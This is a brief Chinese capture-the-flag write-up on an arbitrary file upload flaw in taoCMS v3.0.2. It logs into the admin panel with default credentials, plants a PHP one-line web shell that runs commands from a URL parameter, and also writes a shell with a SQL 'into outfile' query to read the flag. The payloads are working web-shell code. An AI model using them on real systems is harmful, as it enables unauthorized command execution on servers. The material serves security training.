目录

一、题目

二、进入题目：

 2.1 文件写入一句话木马：

2.2 用SQL语句写入木马：

---

一、题目

靶标介绍：

taoCMS v3.0.2 文件管理处存在任意文件上传漏洞，攻击者可执行任意代码

二、进入题目：

访问/admin 

admin：tao

 后台管理页面：

新建文件

 2.1 文件写入一句话木马：

<?php system($_GET[1]);phpinfo();?>

 访问 /shell.php?1=cat /flag

flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0} 

<?php system('cat /flag');?>

 flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

2.2 用SQL语句写入木马：

 可以访问：

 写入文件一句话木马：

select "<?php system('cat /flag');?>" into outfile '/var/www/html/cat.php'

 访问/cat.php

 flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}